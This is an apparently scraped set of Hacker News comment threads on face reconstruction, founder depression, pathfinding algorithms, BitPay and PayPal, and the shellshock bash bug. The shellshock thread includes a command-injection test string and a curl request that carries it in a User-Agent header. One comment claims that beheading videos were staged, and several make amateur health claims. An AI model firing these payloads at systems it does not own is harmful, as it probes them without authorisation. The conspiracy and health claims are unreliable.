Tragic they removed the verbal audio from the demo video. It would have been much easier to judge the visual accuracy if the reconstructed lip motion were combined with the original sound.
Aqwis 3 days ago 1 reply      
Very impressive. How large does the photo collection of the individual have to be to achieve results like those in the video?
SnowProblem 3 days ago 0 replies      
This will be huge for VR.
igriffer 2 days ago 0 replies      
Hi! Anybody have some sources? I want to touch this method =) These 3D reconstructions are the best material for face recognition!
31reasons 2 days ago 0 replies      
This + Virtual Gesture Tracking + VR = Virtual Meetings
polskibus 2 days ago 0 replies      
The question that burns me is - when will we see this amazing algorithm implemented as part of OpenCV ?
debt 3 days ago 1 reply      
I've been increasingly interested in the Face. Human beings must have some incredible mental calculations going on when parsing a face. We're an evolved species that use the face as a form of communication.

I love the attached video in the link because it isolates perfectly the face. If you look closely you can see these tiny minute combinations within the face as each person talks; the eyes shifting, the face rotating, looking in various directions, the forehead crunching, the eyebrows raising, smiling, etc. All of these "cues" combine to create a message that we interpret instantly.

The face has inspired me lately to read more into this subject as it seems, at least on the surface, to be an extremely complex innate human ability; facial recognition.

Htsthbjig 2 days ago 0 replies      
Quite dangerous what this technology will mean in the future, they could manufacture evidence against you, publish it, and then let the masses lynch you.

I think this is what happened to the recent decapitation videos, they were reconstructed from home videos.

IMO the videos with the people dead on the floor are true, but the videos where they talk are staged.

Today we know there was a CIA team whose job was faking videos of Osama Bin Laden: http://blog.washingtonpost.com/spy-talk/2010/05/cia_group_ha...

Remember Osama Bin Laden appeared and disappeared according to US army interest at the time, finally ending in very strange circumstances (and being buried in the ocean, not letting anyone else internationally confirm (by DNA) he was Osama).

For me it is staged because current technology could synthesize a voice only if there are not strong emotions. The same happens with the voice.

With strong emotions it becomes very easy for familiars and friends to notice as people do specific gestures and most of them are not recorded in video.

That people are perfectly calm before dying I could understand, but that they do while saying exactly what their captors want I can't.

Also, before the videos most of the population in the UK did not want to go to war; after the videos (with a UK native), most of them support war, quo prodis?

A Long, Ugly Year of Depression That's Finally Fading
309 points by squiggy22  6 days ago   128 comments top 27
karmajunkie 6 days ago 0 replies      
Man, there are a lot of diagnoses getting thrown around this thread. As a caregiver to someone with a serious illness, as well as someone who periodically suffers from many of the same mental and emotional issues raised here... How about refraining from doing that unless you are A) a mental health or otherwise trained medical professional; and B) someone who has actually seen and assessed the patient. I'm not calling out anyone in particular because let's face it, this is HN and we're probably all know-it-alls at one time or another, but this can have some particularly pronounced thoughts and effects on the posters who are getting the comments.

If you are dealing with any of these issues, my heart goes out to you. Please reach out to a counselor, or at the very least a counselor or therapist who specializes in the things you're dealing with. If you need help finding one, my email is in my profile, I'm glad to help.

tst 6 days ago 4 replies      
I'm also recovering from a depression which lasted for quite a while. It absolutely sucks because you think you're worthless, nobody loves you, you can't get anything right and the best would be if you just wouldn't exist anymore.

And on top of that you isolate yourself. I know how hard it was to ask for help therefore I want to show you some things which helped me:

- Realize that your depression is lying to you. It doesn't tell the truth. It makes you believe that something is logical even if it isn't.

- Read 'Feeling Good' - terrible title, great book. It will probably work better than average on the average HN reader because it takes a 'rational' approach to depression (cognitive-behavioral therapy). It helps you to recognize destructive thought patterns and how to deal with them.

- Garbage in, garbage out. What works for computers also works for your body. Yeah, you're a geek but you can eat some vegs instead of the 500th pizza. Also working out (or other sports) are pretty great.

- Long term: Therapy which tries to work on the root cause and not just at symptoms.

Finally, here's a rather extensive list with lectures, books, exercises, etc. which help dealing with depression [1]. Back when I was fed up with feeling crap I created a spreadsheet with the 8 activities and tracked those every day.

Note: Every person seems to react differently. I read about people who improved a lot by meditating - on the other hand, it didn't work for me.

So, try some things out and don't give up. You can beat that liar in your head.

[0]: http://www.amazon.com/Feeling-Good-The-Mood-Therapy/dp/03808...

[1]: http://www.reddit.com/r/getting_over_it/comments/1nd14u/the_...

PS: If you have any questions feel free to ask - if you want to send me a private one write at <username> @ panictank.net

dchuk 6 days ago 3 replies      
I guess I'll be the only person to comment on the actual Moz business struggles rather than the depression side of this post. Moz raised their money at a really tricky time because it was right before Google essentially bent over the SEO industry. When Rand mentions the Content tool that hasn't even started being developed, that was something that was supposed to take your Google Analytics keyword referrer data and match it to your content and your rankings and your links and your competitors and basically help you spot keywords and content you can easily rank better for.

The timeline seems to be matching up where they had this plan for this tool before any of the Google SSL stuff started, so as they started working on the design and UX of it, Google started rolling out the SSL stuff and it basically ruined their idea. Moz ended up adding tools to try and guess what keywords made up your "(not provided)" data but that's a far cry from what they were originally planning.

I'm basing this entirely on being heavily involved in the SEO industry around the times mentioned in Rand's article and having even run a successful SEO SaaS product (which is still going even though I've moved on to other projects). I just remember seeing screenshots of what they wanted to build and thinking "wow, if they can nail this, it will be great". I wanted to build a similar app. But when Google started hiding all organic keyword data in analytics, I distinctly remember saying "Well there goes Moz's whole new product".

Google really fucked the SEO world up with their (not provided) move. Think what you will about SEO but it's still a legitimate marketing channel and I really have never been able to understand why Google thinks it's ok to not share your organic keyword data but your paid keyword data is totally fine to share with site owners.

But not much anyone can do about that now I suppose.

jtbigwoo 6 days ago 0 replies      
>> ...layoffs is a Pandora's Box-type word at a startup. Don't use it unless you're really being transparent (and not just fearful and overly panicked as I was).

I made a similar mistake once as a manager and experienced this kind of thing more than once as an employee. Certain words like "layoffs" or "merger" are so loaded because employees know that you know more than they do. Even if you think you're being totally transparent, employees are correct to assume that you're holding some things back because you are. It's your job to understand the state and direction of the company and give your employees the information they need to do their jobs. Employees, especially the smart ones, are going to try to infer additional information from what you tell them even when you think you've told them everything they need to know. Leaders need to be aware that a certain amount of "Kremlinology" happens in every company.

He made things worse by being vague about the company's real situation and contradicting himself a couple sentences later when he said, "...we'll survive (though not with much headroom..." If he's talking about layoffs, who is this "we"? Everybody? Rand and Sarah? If you're going to be transparent, you also need to be specific and direct. A better approach might have been, "Sarah and I modeled out some worst-case scenarios last week and this stretches our break-even point an extra six months, which will constrain our growth."

astockwell 6 days ago 0 replies      
Speaking purely to the experiences of building a new software product, I've seen this exact story play out countless times. Everyone (except maybe the engineers themselves) seems to think that designing a software product is part of the "planning phase", and thus should happen before any time is "wasted" on development:

> "That product planning led to an immense series of wireframes and comps (visual designs of what the product would look like and how it would function) that numbered into the hundreds of screens..."

The biggest contributor to this I've seen is the dozens (hundreds? thousands?) of small ways that a design (done in a vacuum, without simultaneous prototyping) will differ from established development patterns, frameworks, and other pre-packaged solutions that engineers use daily to avoid reinventing every wheel. And engineers respond with timelines that expect to be able to leverage those frameworks. Thus the dissonance begins.

One example: a design calls for a form to be broken across 4 pages. There may be great aesthetic rationale or even user testing to support this, but that means that in all likelihood any framework (e.g. Rails/Flask/Play/etc, not to mention native apps) will have to have additional modification to support sessions, changes to validation, changes to the auth domain, persistence changes, etc. And it's not necessary for an MVP. And many times these differences are much more subtle and deeply entrenched, and would require rethinking much of the wireframes/designs to align with development patterns. /rant

I'm not sure what the answer is here, except maybe that this is one more point in favor of having a "technical founder" or in general a technical person with decision-making authority, to avoid going down a road without proofing out your ideas or timelines.

Alex3917 6 days ago 0 replies      
> "the funny thing is, Marijuana doesn't have any pain-killing properties. It just lessens tension, anxiety, and stress for some people."

Marijuana is an analgesic. But in this case the effects are stemming from the fact that it's an anti-inflammatory, so that the fluid in your disc is no longer compressing the spinal nerves. And the fact that it reduces anxiety also reduces inflammation even further, since anxiety is probably largely what was causing the inflammation.

johnyzee 6 days ago 0 replies      
I love it when CEOs own up like this, it's probably one of the most appealing traits in a leader I personally can think of. As long as they don't become too insecure to actually lead, introspection and self-criticism are strengths, not weaknesses. Besides, being aware of these traits and their negative repercussions puts you in a pretty good place, the ones who really suffer are the guys who repress and deny the down slopes, always happy and bubbly on the outside but in reality inches from a mental breakdown.

The last part about how stress causes physical health problems is very important, and very overlooked. Besides the muscle and nervous tension the OP mentioned, stress seriously reduces immunity which can manifest itself in a myriad of unexpected ways (whichever subsystem fails first), from infections to cysts and all kinds of nastiness.

gadders 6 days ago 0 replies      
One last comment - this post from Rand reminds me of the following from Ben Horowitz:

"By far the most difficult skill for me to learn as CEO was the ability to manage my own psychology. Organizational design, process design, metrics, hiring and firing were all relatively straightforward skills to master compared to keeping my mind in check. Over the years, Ive spoken to hundreds of CEOs all with the same experience. Nonetheless, very few people talk about it and I have never read anything on the topic. Its like the fight club of management: The first rule of the CEO psychological meltdown is dont talk about the psychological meltdown."


mikeleeorg 6 days ago 0 replies      
This is an incredibly brave, and hopefully cathartic post by someone I greatly admire. I really hope he is able to find the support and peace he needs.

As a bit of an aside, I wonder how much of this has led to similar troubles for other founders:

When the Foundry investment closed, we redoubled our efforts to build Moz Analytics. We hired more aggressively (and briefly had a $12,000 referral bonus for engineers that ended up bringing in mostly wrong kinds of candidates along with creating some internal culture issues), and spent months planning the fine details of the product.

I've heard from friends & colleagues about the massive amount of pressure they've felt after closing an investment round. While fundraising is already an incredibly trying process, the next stage is sometimes even more difficult.

In contrast, other friends & colleagues who've opted for the bootstrapped route (either by choice or circumstance) haven't seemed to face a similar massive amount of pressure. Yes, they faced incredible stress too, but not to the level of those that have raised capital.

This is merely an anecdotal observation made in my peer group. I don't mean to imply that this is some kind of phenomenon. And clinical depression is something that can cut through any kind of circumstance.

I just can't help but notice the stark difference in stress level of founders who are growing organically & carefully vs founders who are in a mad recruiting rush and sometimes hire the wrong kind of people. I wonder how much of a relationship there is between having the right kind of people in your company vs the wrong kind of people, and the stress level of a founder. I would imagine a lot.

bocalogic 6 days ago 1 reply      
I respect Rand and give him a lot of credit for vocalizing his challenges. Depression is a challenge and it can be overcome.

I am not a doctor, but I can tell you that a lot of my peers are suffering from depression from business, marriage or just in general.

One thing I do know is that the world has changed a lot in the past decade. The price of everything just keeps going up and we are constantly bombarded by information. Humans are not built that way. There is no badge of honor for being under stress 24/7. It will catch up to you one way or the other.

Humans suffer from the fight or flight responses that we encounter during high stress situations. The challenge is to digest it and make decisions not based on fight or flight emotions.

The body produces cortisol when we are under duress and it is horrible for you. It screws up everything with your body and your mind. One way to counteract this is by working out, getting sunlight, eating the right foods and staying off caffeine. Try some black or green tea instead.

30 minutes of working out will combat cortisol production for about six hours. Even going for a walk helps a lot.

Most of the world's brightest minds and most successful people suffer from depression and knowing that you ARE NOT ALONE is a huge step forward.

You can beat depression and your life will turn around!

Talking about it and seeking help is definitely a step in the right direction. Keep your chins up.

raheemm 6 days ago 0 replies      
So few people and places can allow for this level of vulnerability and authenticity. This post is going to help a lot of people.

I have even more respect for Rand and Moz. We can say Fail Fast, Fail this, fail that ... but this kind of writing is the true embrace of failure, learning, wisdom, humanity.

gadders 6 days ago 4 replies      
I admire what Moz has done and it was an interesting read.

My comment is more of a meta one about HN. Are we really that interested in these stories of depression? We seem to get at least one a week. I realise it's an issue that may affect people here, but I'm not sure if we need the volume we are seeing now.

jroseattle 5 days ago 0 replies      
I read through this and the Can't Sleep/Loop post, which had me wiping my eyes. I feel I'm there, right now.

We're in the middle of raising money, while I also keep the engineering ship moving forward with product releases. We're about to run out of initial seed money, as we were supposed to have brought in the balance of the round and been on to Series A at this point. It's challenging, but I feel like I'm handling it.

Or so I thought. It turns out, I'm getting little sleep right now -- maybe 4-5 hours a night, on average. I've gained back so much weight and I abhor seeing myself in photos. I watch colleagues take absurd plans to investors and get way overfunded, more than they were ever asking to take on, while our little operation that's actually generating revenue (we will likely be break-even in 6 months) gets passed. I know it's not a rational reaction, but still the mental headwinds it creates really sap my soul.

It sucks when you're a (very) logical being, and something in your head no longer fits into place. I'm short with my kids at home, and I literally dread downtime. I find that cocktails go down easy, really easy.

It's a loop, alright.

danielweber 6 days ago 1 reply      
Slightly OT, but I read the whole thing thinking Moz was a nickname for Mozilla, or, at the least, that Moz was related to Mozilla.

It's still good to get these stories.

swombat 6 days ago 9 replies      
Forgive my ignorance and bluntness, but reading the above, it sounds more like an anxiety disorder than like depression. Both are serious, but I'm not sure if it helps to confuse the two?

I've not experienced either seriously, but I know people who have. Depression seems to be more about things not mattering anymore, everything being pointless, the world seeming drab and just not fun anymore, rather than feeling that everything is going to go to shit. Anxiety, though, (and I'm speaking from experience here, having had some light anxiety attacks caused by too much regular caffeine usage) seems to be characterised by a feeling of impending doom, that everything is wrong, it can't be fixed, it's all hopeless, etc. But in my (mild) anxiety attacks, like Rand, I still cared about the outcome. I just felt like there were too many problems to solve, overwhelmed, ready to say "fuck this", give up the entire thing, and start again from scratch with something completely different.

PS: Otherwise, props for the very honest and open article. Running a business is a lot of responsibility and very stressful and it can be comforting to know you're not the only who seems surrounded by world-ending scenarios.

karl24 6 days ago 0 replies      
Mental illness impacts more people than cancer, diabetes, or heart disease. Unfortunately only 1/3 of people who have the illness get treatment due to cost, access, stigma, etc.

We're working on an app that uses technology to help bring clinically proven treatments to market at a price point that dramatically improves access. We are pairing this with product design that's common on the consumer web but uncommon in mental health apps to help with adherence and engagement with treatment.

I hope this isn't perceived as attempting to capitalize on a serious thread. We (the founders) have incredibly personal reasons for pursuing this problem. Many in this thread are likely ideal early adopters for the product. The general awareness that this discussion is raising is a good opportunity to reach out and ask for help as helping us will ultimately help many others.

Two ways to help:

(1) 7 question survey, < 1 min to complete: http://bit.ly/1plE2Rg

(2) contact us directly via cbtmobileapp@gmail.com if you'd like to provide insight via a more in-depth interview.

marklittlewood 6 days ago 0 replies      
Depression in technology is a very common condition. If you suffer from it, please know you ARE NOT ALONE. This talk is very honest, open and has some really helpful and practical advice.


akrymski 5 days ago 0 replies      
I've been through this at every startup I founded, but managed to pull through in the end - and I'm still hoping this startup won't be any different. I struggle to imagine if any CEO has not had a tough time like this and felt utterly depressed at least once when things weren't working out. Rather than focus on the depression aspect however, why not discuss what COULD have been done better, and what Rand and other CEOs can learn from this - because ultimately there's an important lesson there besides "depression sucks":

- Don't bet your whole business on one product. Products come and go, businesses pivot. Remember how Steve Jobs launched the Mac? He created a separate, small division for the Macintosh to directly compete with the rest of the company (working on Lisa - which wasn't going well actually). That's genius. He knew Mac is a risky project that could well take much longer than anticipated. He didn't bet the whole house.

- Start as small as possible. Moz Analytics was meant to be this giant swiss army knife right? Wrong. MVP lessons still apply. Couldn't you have launched the new brand with a tiny set of core features? Broke it into a modular setup where consumers could pay for features/modules in the future as you develop them?

- Iterate. Real artists ship, remember? Agile software development and all that? Doesn't sound like you had clearly defined iterative goals that you were hitting as you went, because then you'd really have an idea for where you are in the software development process. You seemed to have to go on someone's word on this. Instead you should have been producing A product every month with an increasing set of features. That way you could have still launched on time, but with less features.

- Review your progress often, and don't lose sight of the grand mission. Being smart doesn't help here - it often makes you stubborn, and I've got the same issue. But sometimes you need to have that thc-truffle, take a step back and think how else you could allocate your resources. Are there some other opportunities that the business can simultaneously pursue with a small set of resources as a backup plan? Are there some major M&A deals that can be done to shuffle things around? Do we need to hire more staff / or let people go who aren't hitting the deadlines? Drastic times call for drastic measures. The biggest issue with depression is that deep inside you still expect things to just get better on their own. And as they don't, you feel worse. Well the bad news is they won't get better on their own. You have to do something about it.

- Don't fail to communicate. The value of your business is in its passionate community, not one product. Seems like there are lots of people passionate about SeoMoz. Instead of shutting yourself out due to what appeared to you as a product failure, perhaps you could have engaged the community in the process, help you establish the product roadmap for the features you should be rolling out first, and try to understand why 90k of sign ups failed to try out the product.

ryanobjc 6 days ago 2 replies      
We talk a lot about successes.

It's also good to talk about failures, both partial and more complete.

And redemption.

The road to victory is long, and I would put my back against Rand because I know this struggle has made him better.

autism_hurts 6 days ago 2 replies      
I cannot stress how much exercising to exhaustion daily (read: Crossfit) and eating healthy (Slow Carb / Paleo) impacted my depression.

Please try them before you medicate.

austengary 6 days ago 0 replies      
Not an overnight fix. But with sustained effort, meditation changed my life. Eventually other things fell in place. Diet, exercise, relationships, mental health. Buddhist teachings really helped too.

I started here. http://headspace.com

DanBC 6 days ago 0 replies      
Here's what the English "National Institute for Health and Care Excellence" say: https://www.nice.org.uk/guidance/CG90
l33tbro 6 days ago 1 reply      
As somebody who is not depressed, it is always confronting to see just how hard depressed people are on themselves.
x0x0 6 days ago 0 replies      
Wow, props to Rand for sharing this.

Rand, if you're reading this, two things occur:

1 - you're far from the first person to go for big-bang software releases (though listening to your CTO is probably a good idea)

2 - in _Fooled By Randomness_ by Taleb (I believe, I could be misremembering) he describes the incredible level of stress that monitoring his investments daily created. I seem to recall the author writing that he simply was unable to monitor them every day and instead had to only look at some periodic summaries. Perhaps this may help people who get too mentally exhausted looking at numbers daily? I mean, it's good to notice immediately if they crater, though that can be scripted. Beyond that, there's probably not much value looking at them 7 days a week that you don't get looking at them once every seven days. I use the same technique on the elliptical machine; time crawls if I look at the timer, so it's an exercise of will to go as long as possible before looking.

Hope he's in a better place now.

andreash 6 days ago 0 replies      
One of the most honest blog post I've ever read.
Siecje 6 days ago 0 replies      
thinknothing 6 days ago 0 replies      
I started writing poetry when I got depressed - www.thinknothing.co
332 points by WestCoastJustin  3 days ago   25 comments top 13
reitzensteinm 3 days ago 2 replies      
One trick I've used quite a bit in games I've written is to do a breadth-first search of the entire playfield, with no termination, resulting in data for how to get from any tile to the destination.

This has a few nice advantages:

* Breadth first is trivially broken up to iterate over multiple frames, amortizing the cost of visiting each tile

* It reduces the worst case as the number of enemies scales up but the destination counts are low.

* The implementation in general is very simple

* You can still early terminate if you keep track of the farthest distance a pathfinding layer needs to satisfy.

* No pathological, worst case situations where a playfield becomes very expensive to pathfind. An open field is the worst case.

I first used this in Robokill, a flash game which often had 20+ enemies on the same screen tracking the player. I estimated at the time that it cost about as much as doing A* on ~5 enemies.

In games, the worst (common) case is basically all that matters - a constant 60fps is significantly better than 100fps dropping to 30fps occasionally.
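
The flow-field approach described above, written out as an added example (my own code, not the commenter's or any game's): one breadth-first pass from the destination fills a distance field for the whole grid, every mover then just walks downhill, and the same search can be run with a per-frame budget or cut off at a radius. The grid, walls and coordinates are constructed sample data, and the function names (`buildDistanceField`, `followField`, the `maxDist` radius parameter) are my own.

```javascript
// Added example, not code from the comment above or from any game:
// a breadth-first "flow field" over a tile grid, computed once from the
// destination so that every mover can follow it without its own search.
// The grid, wall layout and coordinates below are constructed sample data.

const GRID = [
  "..........",
  ".####.....",
  ".#........",
  ".#..####..",
  ".#.....#..",
  "....##.#..",
  ".##....#..",
  "..........",
];

const WALL = "#";
const UNREACHED = -1;                            // walls and unvisited tiles
const DIRS = [[1, 0], [-1, 0], [0, 1], [0, -1]]; // 4-connected movement

function emptyField(grid) {
  return grid.map((row) => new Array(row.length).fill(UNREACHED));
}

// Core BFS as a generator that yields once per expanded tile. A game loop can
// resume it with a fixed budget per frame (the amortisation trick from the
// comment), while buildDistanceField simply drains it in one go. `maxDist` is
// the early-termination radius: tiles at that distance are recorded but not
// expanded, so nothing farther away is ever visited.
function* bfsExpand(grid, dx, dy, dist, maxDist) {
  const h = grid.length;
  const w = grid[0].length;
  if (grid[dy][dx] === WALL) return;             // nothing can reach a wall
  const queue = [[dx, dy]];
  let head = 0;                                  // read index; avoids O(n) shift()
  dist[dy][dx] = 0;
  while (head < queue.length) {
    const [x, y] = queue[head++];
    const d = dist[y][x];
    if (d < maxDist) {
      for (const [ox, oy] of DIRS) {
        const nx = x + ox;
        const ny = y + oy;
        if (nx < 0 || ny < 0 || nx >= w || ny >= h) continue;
        if (grid[ny][nx] === WALL || dist[ny][nx] !== UNREACHED) continue;
        dist[ny][nx] = d + 1;                    // first visit is the shortest
        queue.push([nx, ny]);
      }
    }
    yield;                                       // one unit of work done
  }
}

// Whole field in one call: steps-to-destination per tile, UNREACHED for walls
// and for anything cut off (or beyond maxDist).
function buildDistanceField(grid, dx, dy, maxDist = Infinity) {
  const dist = emptyField(grid);
  for (const _ of bfsExpand(grid, dx, dy, dist, maxDist)) { /* drain */ }
  return dist;
}

// Same field built across simulated frames, expanding at most `tilesPerFrame`
// tiles per frame; returns the finished field and how many frames it took.
// In a real loop the previous complete field keeps serving movers meanwhile.
function buildDistanceFieldOverFrames(grid, dx, dy, tilesPerFrame) {
  const dist = emptyField(grid);
  const work = bfsExpand(grid, dx, dy, dist, Infinity);
  let frames = 0;
  let done = false;
  while (!done) {
    frames += 1;
    for (let i = 0; i < tilesPerFrame && !done; i += 1) done = work.next().done;
  }
  return { dist, frames };
}

// A mover at (sx, sy) just steps to any neighbour whose distance is one less;
// BFS guarantees such a neighbour exists for every reached tile. Returns the
// tile sequence from start to destination, or null if the start is cut off.
function followField(dist, sx, sy) {
  if (dist[sy] === undefined || dist[sy][sx] === undefined) return null;
  if (dist[sy][sx] === UNREACHED) return null;
  const path = [[sx, sy]];
  let x = sx;
  let y = sy;
  while (dist[y][x] > 0) {
    const want = dist[y][x] - 1;
    for (const [ox, oy] of DIRS) {
      const nx = x + ox;
      const ny = y + oy;
      if (dist[ny] !== undefined && dist[ny][nx] === want) { x = nx; y = ny; break; }
    }
    path.push([x, y]);
  }
  return path;
}
```

The cost of `buildDistanceField` is one visit per open tile regardless of how many movers share it, which is the "open field is the worst case" property: no wall layout can make it more expensive than the tile count. `buildDistanceFieldOverFrames` only shows the budgeting; in a game the movers would keep reading the last complete field until the new one finishes.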

curiousAl 3 days ago 0 replies      
Wow, this is a fantastic visualization of algorithms with scary doctoral-thesis-y names. I love visualizations that make scary things simple.
tokenizerrr 3 days ago 1 reply      
Very nice. If the author is the submitter or sees this, could you please provide some details on what kind of libraries and techniques have gone into creating this? A blog post or something would be great.
newbrict 3 days ago 1 reply      
The recursive visualization is really slow on even moderately complex graphs, otherwise it's a really neat tool
noiv 3 days ago 0 replies      
The above pathfinder is much faster with a binary heap, https://github.com/bgrins/javascript-astar and can be heavily optimized if you know your engine. With SpiderMonkey I get a fixed cost of around 1ms for initialization and it checks nearly 2000 nodes in 1ms on a 3 GHz Core Duo with a relatively costly euclidean heuristic. So worst case on a 40x50 map is ~2ms. If worst case can be avoided upfront you'll always get a response within 2ms even with a 2000 nodes long path on most maps. It is amazing what one can do with JS nowadays.
jMyles 3 days ago 2 replies      
In my first bit of play, I just tried to find cases where Manhattan lost to the others. It seems like Manhattan is not as good when faced with a plausible path only to be thwarted at the end - is this right?

Can you show a few cases where Manhattan loses by a landslide?

tejon 3 days ago 0 replies      
Of course it's a gray link... but wow, major enhancements since ~1 year ago when I was on my pathfinding binge. Good stuff! Never did implement full jump-point optimization, though I got halfway there by manipulating queue priorities.
iandanforth 3 days ago 1 reply      
None of these appear to work in an intuitive fashion. Are there algorithms that better resemble biological strategies? If I create a large walled area, I expect an entity to explore in one direction with a preference for external walls, miss areas and completely fail sometimes.

Here's a cute and furry demonstration of biological pathfinding: https://www.youtube.com/watch?v=HRd5WYrnML4

muhuk 3 days ago 0 replies      
In case you miss the tiny link, here's the source: https://github.com/qiao/PathFinding.js
diziet 3 days ago 0 replies      
For a similar problem, check out http://www.pathery.com/ - create the longest possible maze with X blocks.
jokoon 3 days ago 0 replies      
I recently implemented A* with the help of this website, which really explains it well.


I also used a method to create a discrete path between cells, to straighten the path when possible.

poseid 3 days ago 1 reply      
I wonder if something like this could be used to automatically place components in an electrical circuit (PCB)
jwklemm 3 days ago 0 replies      
Really useful library and great visualizations. I'm having flashbacks to my CS algorithm analysis class.
BitPay and PayPal
308 points by seansoutpost  2 days ago   147 comments top 11
trevordev 2 days ago 6 replies      
BitPay sponsored angel-hack Seattle that I participated in this summer. Their developer API was horrible and poorly documented, wasting everyone's time. I was in one of the few groups that got it to work. When asking when we would find out who won the 5 bitcoin prize for best use of it we were told to contact BitPay. I contacted them multiple times and support told me to contact their CEO, who ended up not responding to my emails. I will not use BitPay in the future.
andrewljohnson 2 days ago 4 replies      
rcraft 2 days ago 6 replies      
Is paypal just ignoring the IRS' recent guidelines that bitcoin is treated as property?

From http://www.bloomberg.com/news/2014-03-25/bitcoin-is-property...:

"Today's IRS guidance will provide certainty for Bitcoin investors, along with income-tax liability that wasn't specified before. Purchasing a $2 cup of coffee with Bitcoins bought for $1 would trigger $1 in capital gains for the coffee drinker and $2 of gross income for the coffee shop."

"It's challenging if you have to think about capital gains before you buy a cup of coffee," he said.

canvia 2 days ago 0 replies      
It wasn't just BitPay, also Coinbase and GoCoin: https://www.paypal-community.com/t5/PayPal-Forward/PayPal-an...
highercenter 2 days ago 0 replies      
"More choices in how people create value, share it, buy, sell and trade it, that's exactly what PayPal is all about," said Scott Ellison, Senior Director, Strategy, PayPal.

That's amazing! And me thinking PayPal was all about our money!

earthmeLon 1 day ago 0 replies      
Hmmmm... I thought that a large reason many people helped develop bitcoin and its community was to thwart PayPal, its highly-politically-motivated nature, and others like it.
appleflaxen 2 days ago 0 replies      
Nothing could make me less interested in BitPay. PayPal is just such a negative connotation in my mind that it turns me off of a business partner just to know they are collaborating.
jtwebman 1 day ago 0 replies      
What do you guys think of Coinbase? Is it a good replacement for BitPay? Sorry, I am new to this area but wanted to start accepting Bitcoins.
ssteinb 2 days ago 1 reply      
Paypal is going to acquire the shit out of them. Calling it now.
Everhusk 2 days ago 0 replies      
This is really big news for bitcoin, BTC-e is taking off.
SuddsMcDuff 2 days ago 1 reply      
Looks like winkdex.com has gone down under the load
Bash 'shellshock' bug is wormable
290 points by jgannonjr  1 day ago   132 comments top 24
fabulist 21 hours ago 3 replies      
Test your local machine:

export evil='() { :;}; echo vulnerable'; bash -c echo;

Vulnerable computers will print 'vulnerable'.

Test a CGI:

curl -i -X HEAD "http://website" -A '() { :;}; echo "Warning: Server Vulnerable"'

Vulnerable scripts will emit a "Warning" header. If you get a 405 error, try it with a GET request.

I don't know the PoC for the new version which wiggles around the patch.

I've tried the PoC on ksh, csh, and dash; if they're affected, it's more nuanced. It's advisable to rename bash, and replace it with a symlink to dash; it shouldn't break any scripts, and even if it does it's better than getting owned.

mv /bin/bash /bin/_bash

chmod ugo-x /bin/_bash

ln -s /bin/dash /bin/bash
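A defender-side companion to the checks in the comment above, added here as an example and not part of the original thread: it scans Apache/nginx combined-format access log lines (the sample lines and addresses below are constructed) for the `() {` trigger in the header fields that a CGI handler copies into the environment, tallies probing sources, and wraps the same local bash self-test as a function.

```python
import os
import re
import subprocess
from collections import Counter
from typing import List, NamedTuple, Optional

# Any attacker-controlled value that a CGI wrapper exports into the environment
# (User-Agent, Referer, Cookie, ...) can carry the CVE-2014-6271 trigger: an
# exported "function" definition "() {" followed by trailing commands.
# Whitespace between the tokens varies between probes, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format. Quoted fields may contain \" escapes
# (Apache writes the payload's own double quotes that way), so each field
# pattern accepts escaped characters instead of stopping at the first quote.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log: two probes from one source (the echo test from the
# thread, once in User-Agent with escaped quotes, once in Referer) and two
# benign requests, one with stray braces that must not trigger a hit.
SAMPLE_LOG = r'''
203.0.113.7 - - [25/Sep/2014:10:14:03 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :;}; echo \"Warning: Server Vulnerable\""
198.51.100.23 - - [25/Sep/2014:10:14:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
203.0.113.7 - - [25/Sep/2014:10:15:41 +0000] "HEAD /cgi-bin/status.sh HTTP/1.1" 405 - "() { :; }; echo vulnerable" "curl/7.37.0"
198.51.100.23 - - [25/Sep/2014:10:16:02 +0000] "GET /about.html HTTP/1.1" 200 1337 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 {}"
'''


class Hit(NamedTuple):
    ip: str
    time: str
    field: str   # which request field carried the trigger
    value: str   # the raw field, kept for the analyst to inspect


def scan_line(line: str) -> Optional[Hit]:
    """Return a Hit if the combined-format line carries a Shellshock trigger."""
    m = COMBINED_RE.match(line)
    if not m:
        return None  # not combined format; a real deployment would log this
    # Header-derived fields first: HTTP_USER_AGENT and HTTP_REFERER are the
    # environment variables the published probes target.
    for field in ("agent", "referer", "request"):
        value = m.group(field)
        if SHELLSHOCK_RE.search(value):
            return Hit(m.group("ip"), m.group("time"), field, value)
    return None


def scan_log(text: str) -> List[Hit]:
    """Scan a whole log, skipping blank lines, and collect every hit in order."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            hit = scan_line(line)
            if hit:
                hits.append(hit)
    return hits


def sources(hits: List[Hit]) -> Counter:
    """Probes per source IP: the first number you want for triage or blocking."""
    return Counter(h.ip for h in hits)


def local_bash_vulnerable() -> Optional[bool]:
    """Run the thread's env-variable self-test against the local bash.

    A vulnerable bash executes the trailing 'echo vulnerable' while importing
    the function definition, so the word shows up on stdout of a plain 'echo'.
    Returns None when bash is not installed at all.
    """
    env = {**os.environ, "evil": "() { :;}; echo vulnerable"}
    try:
        out = subprocess.run(["bash", "-c", "echo"], env=env,
                             capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return None
    return "vulnerable" in out.stdout


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.time} {h.ip} via {h.field}: {h.value}")
    print("probes per source:", dict(sources(found)))
    print("local bash vulnerable:", local_bash_vulnerable())
```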

patio11 22 hours ago 4 replies      
Yep. We're currently basically waiting to see which completes first: a) a patch for bash which actually works gets released and then trickles into the various ways to get it on every machine in the world or b) someone writes ~10 lines of payload code (download rootkit, execute, connect to IRC channel, join botnet, etc) and then just hits everything in IP4 space with a for loop. Optionally, the for loop gets distributed to new nodes joining the bot net.

If you cannot say "I run no Linux/Unix/MacOS/compatible/etc machine which connects to other machines" you should be at battle stations right now. We're all racing against a for loop and the for loop will probably have a head start.

eah13 21 hours ago 2 replies      
